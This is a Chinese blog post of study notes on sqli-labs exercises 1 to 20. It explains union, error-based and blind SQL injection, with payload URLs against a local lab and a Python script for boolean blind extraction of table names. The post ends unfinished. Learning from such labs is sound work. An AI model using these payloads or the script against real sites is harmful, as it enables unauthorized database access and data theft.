题目1-20

github地址

前言

以前对于SQL注入，就是先判断下能不能注入，可以的话先试着联合查询，不行的话再上SQLMap，去年寒假拿了一本《SQL注入攻击与防御》，拿回家，看了几章就看不下了，最近终于下定决心，把sqli刷一遍，这周做了20题，收获颇丰，做个笔记记录一下

SQL注入基本分类

• 基于错误型
• 联合查询
• 盲注
• 其他

联合查询

题目1,2,3,4,11,12

这种平时最常用的,order by然后union select1,2,3。然后逐渐利用元数据爆数据库，报表，爆字段。但是对原理一知半解。

这里来初步总结下

利用条件

存在注入且会讲数据库查询的内容显示在页面上

基本原理

UNION is used to combine the result from multiple SELECT statements into a single result set.这是官方文档，也就是说union是把多个select的句子输出到同一个结果里面。

看例子。正常的select

这里我们用上union

我们想一想，本来页面是这样的

上面两个是通过数据库返回的结果输出的，那我们可不可以通过一些手段让我们要的结果在这里输出呢，因为使用了union，所以返回结果是union前面和后面的累加，那我们只要让前面无结果输出，那么输出的结果不就是union后面我们自己构建的。

就像这样。那我们操控union 后面的select就可以看到我们要的结果，比如

具体例子

首先，因为union前面列数必须一致，我们必须找出实际列数。这里我们使用了order by,order by 是排序函数，因为order by 排序列数多于实际列数会报错。

http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+

http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+

接下来，我们判断那些列数会输出来，又3列，但并非所有列都会在页面里面输出

http://127.0.0.1/sqli/Less-1/?id=-1' UNION SELECT 1,2,3 --+

接下来，我们就要在2和3的地方写函数来爆出我们想要的结果。

先爆数据库，用自带函数database()

http://127.0.0.1/sqli/Less-1/?id=-1' UNION SELECT 1,database(),3 --+

接下来以此爆表，爆字段，用到mysql5.0之后自带了一个表information_schema可以利用，在这里不一一展示。

基于错误型注入

题目:5,6,13,14,17,18,19,20

利用条件

存在注入且将mysql报错结果显示在页面上

所以我们要做的就是要让系统帮我们把我们想要的结果通过报错爆给我们

利用方式

floor报错

原理：看这篇文章MySQL Duplicate entry报错注入原理，其实简单来讲就是都是由于我们故意把种子写死，二次查询的时候主键冲突

简单介绍下怎么用把

然后认为控制floor（rand(0)*2)这个参数就行。

每次该改变database（）哪个函数的值就行了

刚开始先回用，看不懂原理不要紧，以后用的熟练点再回来来看原理

updatexml报错

这是updatxml的官方文档，这里我们利用的就是第二个参数如果不符合xpath规定，会报错。我们认为控制这个参数

盲注

题目8,9,10,15,16

对于盲注，我以前的观点一直是看能不能叫个脚本，能套就好，也没去深究原理，但是最近对工具以及脚本的理解是工具只能做我们重复，但是不想做的事情。而不是不明原理的，一味的使用。这里都是脚本都不是一个完整的成套的脚本。

利用条件

适用于存在注入，没有报错，且查询到的结果不能显示再页面上。

分类

• 布尔型盲注
• 基于时间的盲注
  
  不同之处在于布尔型盲注正确与否返回的结果是不一样的，但是基于时间的是一样的

几个函数

substr()

mid()

left()

if()

还是官方文档来的容易看，还有例子

实际例子

第8题

正常

出错

只有这两个页面

这时我们按照原先联合查询思路。

但是到

http://127.0.0.1/sqli/Less-8/?id=1%27%20union%20select%201,2,3--+

这里开始不一样了，因为他的即使是正确的结果也不会回显出来。这时我们可以用手动判断他正不正确，不一定要爆出来。

本来数据库中的语句是

select x from XX where xx=xx

那我们就构造语句返回true或者false，使这个语句成为where的字句，用and 连接。

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20length(database())%20=1%20--+

报错

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20length(database())%20=8%20--+

正常

然后用substr

http://127.0.0.1/sqli/Less-8/?id=1'  and substr(datebase(),1,1)='a'

然后修改第二个参数可以得到不同的位数。

可能很多版本又说用ascii这个函数，那应该就是为了折半查找方便。

然后修改datbase()这个函数依次达到报表，爆库的作用。

下面简单贴出用python脚本报表的一个小脚本

import requests
s='''http://127.0.0.1/sqli/Less-8/?id=1\'  and length((select table_name from information_schema.tables where table_schema=(select database()) limit 0,1))={i}  --+'''
for i in range(100):
    url=s.format(i=i)
    content=requests.get(url,timeout=60).text
    if "You are in" in content:
        print i
        break
s='''http://127.0.0.1/sqli/Less-8/?id=1\'  and substr((select table_name from information_schema.tables where table_schema=(select database()) limit 0,1 ),{j},1)=\'{e}\' --+'''
check_char='123456789qwertyuiopasdfghjklzxcvbnm@'
data=""
for j in range(1,i+1):
    for e in check_char:
        url=s.format(j=j,e=e)
        content=requests.get(url,timeout=60).text
        if "You are in" in content:
            data+=e
            print data
            break

下面是运行界面

------------------------------------

未完待续

其他

题目:7,